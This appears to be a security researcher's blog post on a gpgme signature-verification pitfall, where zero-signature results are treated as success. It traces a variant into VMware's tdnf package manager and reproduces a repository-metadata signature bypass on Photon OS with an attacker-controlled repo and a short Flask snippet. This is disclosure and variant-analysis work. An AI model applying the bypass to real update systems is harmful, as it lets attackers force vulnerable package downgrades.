GPGme used confusion, it's super effective !
In this blogpost, we will see an example regarding gpgme which was revealed in July 2020 and how easy it is to find a vulnerable downstream codebase using a simple variant analysis.
Gpgme and fwupd analysis
A few months ago, an interesting advisory impacting fwupd was published publicly, leveraging a dangling S3 bucket and a GPGME signature bypass to push a malicious firmware on potentially several thousands Linux system.
use PGP signatures to ensure that the updated firmware has not been tampered by some attacker on the network, and more specifically the open source library GPGME
("GnuPG Made Easy") to do the verification.gpgme_op_verify_result
function behave in an unexpected way when checking detached pgp signatures. In this setup, the function can return a non-NULL gpgme_verify_result_t
pointer, but containing a list of 0 signatures if none of the keys used to sign the blob were in the verifier's keychain.gpgme
's security team and pointed out this issue. The security team does not evaluate this edge case as a bug or a vulnerability in gpgme
and instead ask "Developers who use libgpgme should ensure that their signature verification logic defends against a zero-signature result".We have basically an "overlapping Venn diagram" situation where on the one hand we have a third party library providing a security feature for the masses which refuses to acknowledge their APIs may be a bit confusing in some cases, and on the other hand an ecosystem of developers which are not security experts — and definitively not gpg/crypto experts — integrating this library in their codebases :

Variant analysis
While reading the origin advisory, my first instinct was "no way fwupd
is the only software making this mistake". And so I lurked a bit on the public repositories in order to find some variants of the same bug. is a really awesome tool in this case, I just searched uses of gpgme_op_verify_result
on public Github repositories and I instantaneously found hits, especially this one :
gpgme_ctx_t pContext
// [COMMENT]: Set ERROR as SUCCESS by default
uint32_t dwError = 0;
gpgme_verify_result_t pResult = NULL;
gpgme_signature_t pSig = NULL;
/* pContext release will free pResult. do not free otherwise */
pResult = gpgme_op_verify_result(pContext);
if (!pResult)
// [VULN]: for a detached signature, gpgme_op_verify_result() succeed but return a list of 0 signatures
// [VULN]: pSig = NULL, so we don't enter the loop
for(pSig = pResult->signatures; pSig; pSig = pSig->next)
if (pSig->status)
fprintf(stderr, "repo md signature check: %s\n", gpgme_strerror (pSig->status));
// [COMMENT]: return SUCCESS, yay \o/
return dwError;
goto cleanup;
As the comments says (the comments are mine, not Vmware's) there is an edge case where we can return ERROR_SUCCESS
with an 0-signature result. In a more "meta" approach, every pattern of code that directly loop over gpgme_verify_result_t.signatures
without checking before if the pointer is NULL has 90% chances to be vulnerable.
Finding a vulnerable pattern is one thing, but it does not always mean the product/library/software is vulnerable. We need to check how the function is used and see if there is a "credible" scenario for an attacker to take advantage of it.
So what's Vmware tdnf and how it's used ?
Photon OS
Vmware is developing for several years now PhotonOS, a "Minimal Linux container host" which is a lightweight Linux distribution catered for cloud environments and optimized for Vmware infrastructure. It also boasts to be a "secure run-time environment" (sic). In a nutshell, it's an Alpine-like distribution for cloud-based VMs.
What's unusual is that they decided not to use a tried and trusted package manager such as aptitude
or yum
but instead to write a new one from scratch based on the DNF specification (the same as yum
, now replaced by dnf
) called tdnf
What's more unusual is they decided to write it in C.
For a package manager.
For a secure OS.
In 2020.
So we have a vulnerable function used in the package manager for a security-oriented Linux distribution maintained by a major software company, what could go wrong ?
TDNF repogpgmecheck plugin
First, in order to test if the vulnerability is accessible, we need to boot into a PhotonOS machine and add a pseudo-repository controlled by us :
root@photon-machine [ ~/ ]$ cat /etc/yum.repos.d/attacker-controlled.repo
root@photon-machine [ ~/ ]$ tdnf repolist
repo id repo name status
attacker-controlled This-Is-Controlled-By-An-Attacker. enabled
photon-updates VMware Photon Linux 3.0 (x86_64) Updates enabled
photon VMware Photon Linux 3.0 (x86_64) enabled
photon-extras VMware Photon Extras 3.0 (x86_64) enabled
root@photon-machine [ ~/ ]$ tdnf list | grep attacker
legitimate-package-but-downgraded.noarch 1.0-1 attacker-controlled
The vulnerable function _TDNFVerifyResult
is not located in the package signature verification (this is done by rpm
's own verification code which is not vulnerable to 0-signatures result) but where signing the repository metadatas. It's a plugin called repogpgmecheck
which is used to protect repositories from update catalog attacks which may force packages downgrades for example.
This plugin is currently optional and it is not yet deployed on a "real" system. Here's how you do it :
root@photon-machine [ ~/ ]$ git clone
root@photon-machine [ ~/ ]$ cd tdnf
root@photon-machine [ ~/tdnf ]$ mkdir build
root@photon-machine [ ~/tdnf ]$ cd build
root@photon-machine [ ~/tdnf/build ]$ cmake ..
root@photon-machine [ ~/tdnf/build ]$ make
root@photon-machine [ ~/tdnf ]$ cd ..
root@photon-machine [ ~/tdnf ]$ mkdir /etc/tdnf/pluginconf.d
root@photon-machine [ ~/tdnf ]$ echo "[main]\nenabled=1" > /etc/tdnf/pluginconf.d/tdnfrepogpgcheck.conf
root@photon-machine [ ~/tdnf ]$ mkdir -p /usr/local/lib64/tdnf-plugins/tdnfrepogpgcheck/
root@photon-machine [ ~/tdnf ]$ cp build/plugins/lib/tdnfrepogpgcheck/ /usr/local/lib64/tdnf-plugins/tdnfrepogpgcheck/
root@photon-machine [ ~/tdnf ]$ echo "repo_gpgcheck=1\n" >>> /etc/yum.repos.d/attacker-controlled.repo
And finally you activate it :
root@photon-machine [ ~/tdnf]$ echo "repo_gpgcheck=1\n" >>> /etc/yum.repos.d/attacker-controlled.repo
root@photon-machine [ ~/ ]$ tdnf repolist
Loaded plugin: tdnfrepogpgcheck
Error: 404 when downloading
. Please check repo url.
Plugin error: repogpgcheck plugin error: (null)
repo id repo name status
photon-updates VMware Photon Linux 3.0 (x86_64) Updates enabled
photon VMware Photon Linux 3.0 (x86_64) enabled
photon-extras VMware Photon Extras 3.0 (x86_64) enabled
The code needed to reproduce the attack is pretty straightforward (it's a Flask python server tweaked from :
def serve_repomd_xml_asc(version, version2, arch):
# generate a valid repomd.xml file
repomd = generate_repomd(version, arch)
# sign_data_with_throwaway_gpg_key is implemented here :
gpg_signature = sign_data_with_throwaway_gpg_key(repomd.encode("utf-8"))
return Response(gpg_signature)
And the result :
root@photon-machine [ ~/tdnf ]$ rm -rf /var/cache/tdnf/attacker-controlled/*
root@photon-machine [ ~/tdnf ]$ build/bin/tdnf repolist
Loaded plugin: tdnfrepogpgcheck
repo id repo name status
attacker-controlled This-Is-Controlled-By-An-Attacker. enabled
photon-updates VMware Photon Linux 3.0 (x86_64) Updates enabled
photon VMware Photon Linux 3.0 (x86_64) enabled
photon-extras VMware Photon Extras 3.0 (x86_64) enabled
This bug is not earth-shattering : it only allows an attacker to bypass the signature on metadata listing where this check has been enabled (not by defaut). The only attack available in this scenario is a potential downgrade of a package to a version containing a known vulnerability.
Anyway, this issue has been transmitted to vmware and they fixed it :
and tdnf/repogpgmecheck
are not isolated issues :
used to be vulnerable :;a=commitdiff;h=5d73bb62ab80a03c0df9dcba12c5248567121dbdmutt
was also vulnerable : deprecated software but also vulnerable in its time :
And this is only in public repositories indexed by Google.
With this non-obvious API design, gpgme
just handed out a powerful way for developers to shoot themselves in the foot when they want to verify pgp signatures. If you're a security expert auditing a software relying on libgpgme
, just try this attack vector there are good chances you can do something interesting with it.
fwupd issue:
- tndf
- Photon
- gpg/rpm